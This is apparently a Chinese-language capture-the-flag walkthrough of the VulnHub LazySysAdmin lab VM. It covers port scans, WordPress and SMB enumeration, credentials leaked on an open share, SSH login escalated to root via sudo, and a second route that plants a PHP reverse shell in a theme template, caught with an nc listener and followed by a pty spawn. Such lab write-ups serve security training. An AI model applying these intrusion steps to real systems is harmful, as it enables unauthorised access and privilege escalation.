VulnHub – CTF — LazySysAdmin

红日安全CTF小组,加入CTF小组共同学习成长。

/* 红日安全成员 — Mochazz  博客:http://sec-redclub.com/team/  */

环境下载

Lazysysadmin.zip (Size: 479 MB)Download: https://drive.google.com/uc?id=0B_A-fCfoBmkLOXN5Y1ZmZnpDQTQ&export=downloadDownload (Mirror): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zipDownload (Torrent): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip.torrent ( Magnet)

运行环境

  • Virtualbox (二选一)

  • Vnware Workstation player

通关提示

  • Enumeration is key

  • Try Harder

  • Look in front of you

  • Tweet @togiemcdogie if you need more hints

ip探测

由于我们的目标与我们的物理机位于同一网段,所以我们要做的就是先获取目标机器的地址。在内网主机探测中,可以使用netdiscover来进行。

netdiscover -i wlo1

➜  evilk0 netdiscover -i wlo1

Currently scanning: 192.168.21.0/16   |   Screen View: Unique Hosts            
                                                                               
1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 42                  
_____________________________________________________________________________
  IP           At MAC Address     Count     Len MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.0.100   08:00:27:da:8a:ac      1      42 PCS Systemtechnik GmbH

端口扫描

我们需要知道目标机器上运行了哪些服务,利用某些服务的漏洞或配置不当来进行攻击,所以我们先进行端口扫描。

使用masscan扫描

masscan 192.168.0.100 -p 1-10000 –rate=1000


➜ evilk0 masscan 192.168.0.100 -p 1-10000 --rate=1000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100                                
Discovered open port 6667/tcp on 192.168.0.100                                
Discovered open port 22/tcp on 192.168.0.100                                  
Discovered open port 139/tcp on 192.168.0.100                                  
Discovered open port 80/tcp on 192.168.0.100                                  
Discovered open port 445/tcp on 192.168.0.100

使用nmap扫描

nmap -T4 -A -v 192.168.0.100 -p 0-10000


➜ evilk0 nmap -T4 -A -v 192.168.0.31 -p0-10000        

Starting Nmap 7.50 ( https://nmap.org ) at 2018-01-31 20:55 CST
.................................
Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
.................................
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open http       Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql       MySQL (unauthorized)
6667/tcp open irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1.0
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.2.107
|_ error: Closing link: (nmap@192.168.2.107) [Client exited]
MAC Address: 08:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 0.008 days (since Wed Jan 31 20:44:16 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   LAZYSYSADMIN<00>     Flags: <unique><active>
|   LAZYSYSADMIN<03>     Flags: <unique><active>
|   LAZYSYSADMIN<20>     Flags: <unique><active>
|   WORKGROUP<00>       Flags: <group><active>
|_ WORKGROUP<1e>       Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_ System time: 2018-01-31T22:55:23+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms LazySysAdmin.lan (192.168.0.100)

NSE: Script Post-scanning.
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds
          Raw packets sent: 11045 (487.680KB) | Rcvd: 11034 (442.816KB)

对比可发现masscan扫描端口的速度比nmap快很多,但是想要知道端口所运行服务的具体信息,就要用到nmap了。根据扫描结果可知目标机开启了22、80、139、445、3306、6667这几个端口。

我们先从web入手。我们先使用dirb来爆破目标存在的目录(dirb安装方法附在文章最后)


➜ evilk0 ./dirb http://192.168.0.100 wordlists/common.txt -o /home/evilk0/Desktop/result.txt
用法:./dirb 目标url 用于爆破的目录  -o 输出文件

在工具扫描的同时,我们手工探测漏洞利用点。访问目标web服务,未发现什么,查看是否存在robots.txt发现4个目录,并且存在目录遍历漏洞,但是并没用获取到可以利用的信息。

http://192.168.0.100/robots.txt


User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

image.png

使用curl获取目标web的banner信息,发现使用的中间件是apache2.4.7,目标系统为Ubuntu。


➜ evilk0 curl -I 192.168.0.100

HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 13:01:20 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
ETag: "8ce8-5560ea23d23c0"
Accept-Ranges: bytes
Content-Length: 36072
Vary: Accept-Encoding
Content-Type: text/html

我们再来看看dirb扫描结果,发现目标文章用的是wordpress,且还有phpmyadmin


➜ dirb222 cat /home/evilk0/Desktop/result.txt | grep "^+"

+ http://192.168.0.100/index.html (CODE:200|SIZE:36072)
+ http://192.168.0.100/info.php (CODE:200|SIZE:77257)
+ http://192.168.0.100/robots.txt (CODE:200|SIZE:92)
+ http://192.168.0.100/server-status (CODE:403|SIZE:293)
+ http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)
+ http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)
+ http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)
+ http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)
+ http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)
+ http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
+ http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)
+ http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

wpscan扫描结果


root@kali:~# wpscan http://192.168.0.100/wordpress
_______________________________________________________________
      __         _______   _____                  
      \ \       / / __ \ / ____|                
        \ \ /\ / /| |__) | (___   ___ __ _ _ __ ®
        \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
          \ /\ / | |     ____) | (__| (_| | | | |
          \/ \/   |_|   |_____/ \___|\__,_|_| |_|

      WordPress Security Scanner by the WPScan Team
                      Version 2.9.3
        Sponsored by Sucuri - https://sucuri.net
  @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.0.100/wordpress/
[+] Started: Thu Feb 1 01:37:20 2018

[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/

[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/
| Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 1.9
| Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css
| Theme Name: Twenty Fifteen
| Theme URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
| Author: the WordPress team
| Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Thu Feb 1 01:37:24 2018
[+] Requests Done: 356
[+] Memory used: 37.98 MB
[+] Elapsed time: 00:00:04

image.png

enum4linux 192.168.0.100


Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  1 00:46:08 2018

==========================
|   Target Information   |
==========================
Target ........... 192.168.0.100
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=====================================================
|   Enumerating Workgroup/Domain on 192.168.0.100   |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
|   Nbtstat Information for 192.168.0.100   |
=============================================
Looking up status of 192.168.0.100
LAZYSYSADMIN   <00> -         B <ACTIVE> Workstation Service
LAZYSYSADMIN   <03> -         B <ACTIVE> Messenger Service
LAZYSYSADMIN   <20> -         B <ACTIVE> File Server Service
WORKGROUP       <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP       <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

======================================
|   Session Check on 192.168.0.100   |
======================================
[+] Server 192.168.0.100 allows sessions using username '', password ''

============================================
|   Getting domain SID for 192.168.0.100   |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
|   OS information on 192.168.0.100   |
=======================================
[+] Got OS info for 192.168.0.100 from smbclient:
[+] Got OS info for 192.168.0.100 from srvinfo:
LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server
platform_id     : 500
os version     : 6.1
server type     : 0x809a03

==============================
|   Users on 192.168.0.100   |
==============================


==========================================
|   Share Enumeration on 192.168.0.100   |
==========================================
WARNING: The "syslog" option is deprecated

Sharename       Type     Comment
---------       ----      -------
print$         Disk     Printer Drivers
share$         Disk     Sumshare
IPC$           IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server               Comment
---------            -------

Workgroup           Master
---------            -------
WORKGROUP            

[+] Attempting to map shares on 192.168.0.100
//192.168.0.100/print$ Mapping: DENIED, Listing: N/A
//192.168.0.100/share$ Mapping: OK, Listing: OK
//192.168.0.100/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

=====================================================
|   Password Policy Information for 192.168.0.100   |
=====================================================


[+] Attaching to 192.168.0.100 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAZYSYSADMIN
[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


===============================
|   Groups on 192.168.0.100   |
===============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

========================================================================
|   Users on 192.168.0.100 via RID cycling (RIDS: 500-550,1000-1050)   |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)

S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)


==============================================
|   Getting printer info for 192.168.0.100   |
==============================================
No printers returned.


enum4linux complete on Thu Feb  1 00:46:33 2018

windows下获取共享资源


net use k: \\192.168.0.100\share$

linux下获取共享资源


mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt

image.png

发现两个关键的文件deets.txt和wp-config.php

image.png

image.png

所以我们尝试用上面获取的mysql账号密码去登录phpmyadmin,但是发现没一个表项可以查看。

image.png

不过不要紧,上面还有一个密码是12345,而且之前我们登录WordPress页面的时候,页面显示My name is togie.,所以我们可以用账号:togie 密码:12345尝试登录ssh,发现可以成功登录。


togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)

有了root权限,我们就有权限查看目标文件/root/proof.txt,这样就算完成了整个游戏了。这里刚好togie有root权限,所以我直接用sudo su切换到root权限,但是如果togie没有root权限,那么我们就需要通过其他方式来提权了。

思路二

通过账号:Admin 密码:TogieMYSQL12345^^登录WordPress控制面板,向404.php页面模板插入PHP反弹shell的代码。

image.png

编辑好后,点击下面的upload file应用,然后访问http://192.168.0.100/wordpress/?p=2


root@kali:~# nc -vlp 1234
listening on [any] 1234 ...
192.168.0.100: inverse host lookup failed: Unknown host
connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] 36468
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
16:03:42 up 6 min,  0 users, load average: 0.01, 0.15, 0.11
USER     TTY     FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ sudo su
sudo: no tty present and no askpass program specified

出现no tty present and no askpass program specified,刚好目标机有python环境,所以我们导入Python的pty模块。


python -c 'import pty; pty.spawn("/bin/sh")'

但是我们不知道www-data的密码,所以接下来就要进行提权,先来看一下目标机的详细信息


$ uname -r
4.4.0-31-generic
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

所以用CVE-2017-1000112提权即可,但是目标机上没有gcc,这时候,我们可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。

dirb安装方法(kali已自带)


wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make
./dirb #运行即可

参考链接:

VulnHub Walk-through – LazySysAdmin: 1

LazySysAdmin Vulnerable Machine Walk-through

取消
Loading...

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php